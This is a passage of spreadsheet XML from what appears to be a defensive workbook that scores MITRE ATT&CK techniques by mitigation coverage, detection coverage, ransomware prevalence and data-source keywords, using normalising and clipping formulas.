        <f t="array" ref="AH205">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC205)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI205" s="25">
        <f>IF(AH205="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ205" s="25" t="str" cm="1">
        <f t="array" ref="AJ205">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC205)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK205" s="25">
        <f>IF(AJ205="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL205" s="25" t="str" cm="1">
        <f t="array" ref="AL205">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC205)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM205" s="25">
        <f>IF(AL205="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN205" s="59">
        <v>0</v>
      </c>
      <c r="AO205" s="51">
        <v>0</v>
      </c>
      <c r="AP205" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4333333333333343E-2</v>
      </c>
      <c r="AQ205" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.14777777777777781</v>
      </c>
      <c r="AR205" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.14777777777777781</v>
      </c>
      <c r="AS205" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT205" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU20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06" spans="1:47">
      <c r="A206" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.23719428571428575</v>
      </c>
      <c r="B206" s="25">
        <f>SUM(H206,M206,V206)*(1+SUM(AE206,AG206,AI206,AK206,AM206))</f>
        <v>0.37194285714285724</v>
      </c>
      <c r="C206" s="25" t="s">
        <v>905</v>
      </c>
      <c r="D206" s="25" t="s">
        <v>119</v>
      </c>
      <c r="E206" s="25" t="s">
        <v>906</v>
      </c>
      <c r="F206" s="51">
        <v>1</v>
      </c>
      <c r="G206" s="51">
        <v>1</v>
      </c>
      <c r="H206" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I206">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J206">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K206">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L206">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M206" s="25">
        <v>0</v>
      </c>
      <c r="N206" s="51">
        <v>1</v>
      </c>
      <c r="O206" s="51">
        <v>8</v>
      </c>
      <c r="P206" s="51">
        <v>0</v>
      </c>
      <c r="Q206" s="51">
        <v>1</v>
      </c>
      <c r="R206" s="53" t="s">
        <v>120</v>
      </c>
      <c r="S206" s="51">
        <v>7</v>
      </c>
      <c r="T206" s="51" t="s">
        <v>121</v>
      </c>
      <c r="U206" s="51">
        <v>12</v>
      </c>
      <c r="V206" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.22857142857142859</v>
      </c>
      <c r="W206">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X206">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y206">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z206">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>10</v>
      </c>
      <c r="AA206">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.1</v>
      </c>
      <c r="AB206">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.1</v>
      </c>
      <c r="AC206" s="29" t="s">
        <v>648</v>
      </c>
      <c r="AD206" s="25" t="str" cm="1">
        <f t="array" ref="AD206">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC206)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE206" s="25">
        <f>IF(AD206="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF206" s="25" t="str" cm="1">
        <f t="array" ref="AF206">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC206)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG206" s="25">
        <f>IF(AF206="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH206" s="25" t="str" cm="1">
        <f t="array" ref="AH206">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC206)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI206" s="25">
        <f>IF(AH206="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ206" s="25" t="str" cm="1">
        <f t="array" ref="AJ206">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC206)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK206" s="25">
        <f>IF(AJ206="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL206" s="25" t="str" cm="1">
        <f t="array" ref="AL206">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC206)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM206" s="25">
        <f>IF(AL206="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN206" s="58">
        <v>6</v>
      </c>
      <c r="AO206" s="51">
        <v>1</v>
      </c>
      <c r="AP206" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.23719428571428575</v>
      </c>
      <c r="AQ206" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.12398095238095241</v>
      </c>
      <c r="AR206" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.12398095238095241</v>
      </c>
      <c r="AS206" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AT206" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AU20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07" spans="1:47" ht="48">
      <c r="A207" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.6190476190476188E-2</v>
      </c>
      <c r="B207" s="25">
        <f>SUM(H207,M207,V207)*(1+SUM(AE207,AG207,AI207,AK207,AM207))</f>
        <v>0.32857142857142863</v>
      </c>
      <c r="C207" s="25" t="s">
        <v>907</v>
      </c>
      <c r="D207" s="25" t="s">
        <v>401</v>
      </c>
      <c r="E207" s="25" t="s">
        <v>908</v>
      </c>
      <c r="F207" s="51">
        <v>1</v>
      </c>
      <c r="G207" s="51">
        <v>1</v>
      </c>
      <c r="H207" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I207">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J207">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K207">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L207">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M207" s="25">
        <v>0</v>
      </c>
      <c r="N207" s="51">
        <v>0</v>
      </c>
      <c r="O207" s="51">
        <v>0</v>
      </c>
      <c r="P207" s="51">
        <v>4</v>
      </c>
      <c r="Q207" s="51">
        <v>0</v>
      </c>
      <c r="R207" s="52" t="s">
        <v>402</v>
      </c>
      <c r="S207" s="51">
        <v>14</v>
      </c>
      <c r="T207" s="52" t="s">
        <v>403</v>
      </c>
      <c r="U207" s="51">
        <v>8</v>
      </c>
      <c r="V207" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.22857142857142859</v>
      </c>
      <c r="W207">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>22</v>
      </c>
      <c r="X207">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.4</v>
      </c>
      <c r="Y207">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.4</v>
      </c>
      <c r="Z207">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA207">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB207">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC207" s="29" t="s">
        <v>141</v>
      </c>
      <c r="AD207" s="25" t="str" cm="1">
        <f t="array" ref="AD207">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC207)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE207" s="25">
        <f>IF(AD207="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF207" s="25" t="str" cm="1">
        <f t="array" ref="AF207">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC207)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG207" s="25">
        <f>IF(AF207="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH207" s="25" t="str" cm="1">
        <f t="array" ref="AH207">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC207)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI207" s="25">
        <f>IF(AH207="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ207" s="25" t="str" cm="1">
        <f t="array" ref="AJ207">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC207)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK207" s="25">
        <f>IF(AJ207="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL207" s="25" t="str" cm="1">
        <f t="array" ref="AL207">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC207)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM207" s="25">
        <f>IF(AL207="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN207" s="52">
        <v>1</v>
      </c>
      <c r="AO207" s="51">
        <v>1</v>
      </c>
      <c r="AP207" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.6190476190476188E-2</v>
      </c>
      <c r="AQ207" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10952380952380954</v>
      </c>
      <c r="AR207" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10952380952380954</v>
      </c>
      <c r="AS207" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT207" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU20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08" spans="1:47" ht="32.1">
      <c r="A208" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.2857142857142863E-2</v>
      </c>
      <c r="B208" s="25">
        <f>SUM(H208,M208,V208)*(1+SUM(AE208,AG208,AI208,AK208,AM208))</f>
        <v>0.32857142857142863</v>
      </c>
      <c r="C208" s="25" t="s">
        <v>909</v>
      </c>
      <c r="D208" s="25" t="s">
        <v>129</v>
      </c>
      <c r="E208" s="25" t="s">
        <v>910</v>
      </c>
      <c r="F208" s="51">
        <v>1</v>
      </c>
      <c r="G208" s="51">
        <v>1</v>
      </c>
      <c r="H208" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I208">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J208">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K208">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L208">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M208" s="25">
        <v>0</v>
      </c>
      <c r="N208" s="51">
        <v>2</v>
      </c>
      <c r="O208" s="51">
        <v>1</v>
      </c>
      <c r="P208" s="51">
        <v>1</v>
      </c>
      <c r="Q208" s="51">
        <v>0</v>
      </c>
      <c r="R208" s="52" t="s">
        <v>911</v>
      </c>
      <c r="S208" s="51">
        <v>10</v>
      </c>
      <c r="T208" s="52" t="s">
        <v>912</v>
      </c>
      <c r="U208" s="51">
        <v>12</v>
      </c>
      <c r="V208" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.22857142857142859</v>
      </c>
      <c r="W208">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>22</v>
      </c>
      <c r="X208">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.4</v>
      </c>
      <c r="Y208">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.4</v>
      </c>
      <c r="Z208">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA208">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB208">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC208" s="29" t="s">
        <v>913</v>
      </c>
      <c r="AD208" s="25" t="str" cm="1">
        <f t="array" ref="AD208">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC208)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE208" s="25">
        <f>IF(AD208="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF208" s="25" t="str" cm="1">
        <f t="array" ref="AF208">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC208)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG208" s="25">
        <f>IF(AF208="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH208" s="25" t="str" cm="1">
        <f t="array" ref="AH208">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC208)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI208" s="25">
        <f>IF(AH208="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ208" s="25" t="str" cm="1">
        <f t="array" ref="AJ208">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC208)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK208" s="25">
        <f>IF(AJ208="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL208" s="25" t="str" cm="1">
        <f t="array" ref="AL208">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC208)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM208" s="25">
        <f>IF(AL208="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN208" s="60">
        <v>0</v>
      </c>
      <c r="AO208" s="51">
        <v>0</v>
      </c>
      <c r="AP208" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.2857142857142863E-2</v>
      </c>
      <c r="AQ208" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10952380952380954</v>
      </c>
      <c r="AR208" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10952380952380954</v>
      </c>
      <c r="AS208" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT208" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU20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09" spans="1:47" ht="32.1">
      <c r="A209" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.7033333333333329E-2</v>
      </c>
      <c r="B209" s="25">
        <f>SUM(H209,M209,V209)*(1+SUM(AE209,AG209,AI209,AK209,AM209))</f>
        <v>0.437</v>
      </c>
      <c r="C209" s="25" t="s">
        <v>914</v>
      </c>
      <c r="D209" s="25" t="s">
        <v>690</v>
      </c>
      <c r="E209" s="25" t="s">
        <v>915</v>
      </c>
      <c r="F209" s="51">
        <v>1</v>
      </c>
      <c r="G209" s="51">
        <v>1</v>
      </c>
      <c r="H209" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I209">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J209">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K209">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L209">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M209" s="25">
        <v>0</v>
      </c>
      <c r="N209" s="51">
        <v>0</v>
      </c>
      <c r="O209" s="51">
        <v>0</v>
      </c>
      <c r="P209" s="51">
        <v>0</v>
      </c>
      <c r="Q209" s="51">
        <v>0</v>
      </c>
      <c r="R209" s="52" t="s">
        <v>916</v>
      </c>
      <c r="S209" s="51">
        <v>11</v>
      </c>
      <c r="T209" s="52" t="s">
        <v>917</v>
      </c>
      <c r="U209" s="51">
        <v>13</v>
      </c>
      <c r="V209" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.22857142857142856</v>
      </c>
      <c r="W209">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>24</v>
      </c>
      <c r="X209">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.43636363636363634</v>
      </c>
      <c r="Y209">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.43636363636363634</v>
      </c>
      <c r="Z209">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA209">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB209">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC209" s="29" t="s">
        <v>918</v>
      </c>
      <c r="AD209" s="25" t="str" cm="1">
        <f t="array" ref="AD209">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC209)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE209" s="25">
        <f>IF(AD209="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF209" s="25" t="str" cm="1">
        <f t="array" ref="AF209">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC209)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG209" s="25">
        <f>IF(AF209="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH209" s="25" t="str" cm="1">
        <f t="array" ref="AH209">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC209)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI209" s="25">
        <f>IF(AH209="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ209" s="25" t="str" cm="1">
        <f t="array" ref="AJ209">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC209)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK209" s="25">
        <f>IF(AJ209="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL209" s="25" t="str" cm="1">
        <f t="array" ref="AL209">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC209)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM209" s="25">
        <f>IF(AL209="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN209" s="52">
        <v>1</v>
      </c>
      <c r="AO209" s="51">
        <v>1</v>
      </c>
      <c r="AP209" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.7033333333333329E-2</v>
      </c>
      <c r="AQ209" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.14566666666666667</v>
      </c>
      <c r="AR209" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.14566666666666667</v>
      </c>
      <c r="AS209" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT209" s="25">
